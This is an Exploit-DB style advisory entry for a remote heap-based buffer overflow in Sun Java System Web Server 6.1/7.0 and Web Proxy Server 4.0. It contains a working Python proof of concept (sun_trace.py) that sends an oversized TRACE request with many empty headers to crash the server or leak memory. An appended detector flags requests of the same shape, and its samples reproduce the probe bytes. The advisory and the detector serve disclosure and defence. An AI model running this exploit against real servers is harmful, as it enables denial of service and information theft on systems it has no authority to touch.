Vendor: Sun Java System Web Server
CVSS: 7.5 (HIGH)
CWE: Remote Heap-based Buffer Overflow
Product Name: Sun Java System Web Server
Affected Version From: Sun Java System Web Server 7.0 prior to 7.0 Update 8, Sun Java System Web Server 6.1 prior to 6.1 Service Pack 12, Sun Java System Web Proxy Server 4.0 prior to 4.0 Service Pack 13

Remote Heap-based Buffer Overflow in Sun Java System Web Server

The Sun Java System Web Server is prone to a remote heap-based buffer-overflow vulnerability. Attackers can exploit this issue to crash the affected application or to obtain potentially sensitive information that may aid in further attacks.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37648/info

The following are vulnerable:

Sun Java System Web Server 7.0 prior to 7.0 Update 8
Sun Java System Web Server 6.1 prior to 6.1 Service Pack 12
Sun Java System Web Proxy Server 4.0 prior to 4.0 Service Pack 13 

#!/usr/bin/env python
# sun_trace.py
#
# Use this code at your own risk. Never run it against a production system.
# 
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

import socket
import sys

def send_req(host,port):
  buf="TRACE /%s HTTP/1.0\n" % ("A"*4074) 
  for i in range(0,10):
    buf += "%d"%i + ":\n"
                               
  for i in range(ord('a'), ord('z')):
    buf += chr(i) + ":\n"

  buf += "\n" 

  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.connect((host,port))
  sock.sendall(buf)
  resp=""
  while 1:
    s= sock.recv(4000)
    if len(s)<1: break
    resp+=s
  print list(resp)

if __name__=="__main__":
 if len(sys.argv)<3:
  print "usage: %s host port" % sys.argv[0]
  sys.exit()

 send_req(sys.argv[1],int(sys.argv[2]))
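
A defensive check for the request shape the script above sends: a TRACE request with a target of roughly 4 KB, followed by dozens of one-character header names with empty values, terminated with bare line feeds. This is an added example, not part of the original advisory or script; the function names, thresholds and sample requests are assumptions constructed for illustration.

```python
# Added example: flag HTTP requests shaped like the sun_trace.py probe.
# Thresholds and sample requests are constructed assumptions; tune per site.
import re

MAX_TARGET_LEN = 2048     # assumed limit on request-target length
MAX_EMPTY_HEADERS = 8     # assumed limit on headers that carry no value

def inspect_request(raw: bytes) -> list:
    """Return the list of findings for one raw HTTP request head."""
    findings = []
    # Accept both CRLF and bare-LF framing when isolating the head.
    head = raw.split(b"\r\n\r\n", 1)[0].split(b"\n\n", 1)[0]
    lines = re.split(rb"\r?\n", head)
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return ["malformed-request-line"]
    method, target, _version = parts
    if method.upper() == b"TRACE":
        findings.append("trace-method")
    if len(target) > MAX_TARGET_LEN:
        findings.append("oversized-target:%d" % len(target))
    empty = sum(1 for ln in lines[1:]
                if b":" in ln and not ln.partition(b":")[2].strip())
    if empty > MAX_EMPTY_HEADERS:
        findings.append("empty-headers:%d" % empty)
    if b"\n" in raw and b"\r\n" not in raw:
        findings.append("bare-lf-line-endings")
    return findings

def is_suspicious(raw: bytes) -> bool:
    """Alert when TRACE is combined with a size or empty-header anomaly."""
    f = inspect_request(raw)
    anomaly = any(x.startswith(("oversized-target", "empty-headers")) for x in f)
    return "trace-method" in f and anomaly

# Constructed samples (never sent anywhere): a normal GET, a normal TRACE,
# and a request with the same shape as the one sun_trace.py builds.
BENIGN_GET = b"GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n\r\n"
BENIGN_TRACE = b"TRACE / HTTP/1.1\r\nHost: www.example.test\r\n\r\n"
PROBE_SHAPED = (b"TRACE /" + b"A" * 4074 + b" HTTP/1.0\n"
                + b"".join(b"%d:\n" % i for i in range(10))
                + b"".join(bytes([c]) + b":\n" for c in range(ord("a"), ord("z")))
                + b"\n")

if __name__ == "__main__":
    for name in ("BENIGN_GET", "BENIGN_TRACE", "PROBE_SHAPED"):
        print(name, is_suspicious(globals()[name]), inspect_request(globals()[name]))
```

The same conditions can be applied to captured request heads from a proxy or packet capture; the finding strings are meant to be logged alongside the source address.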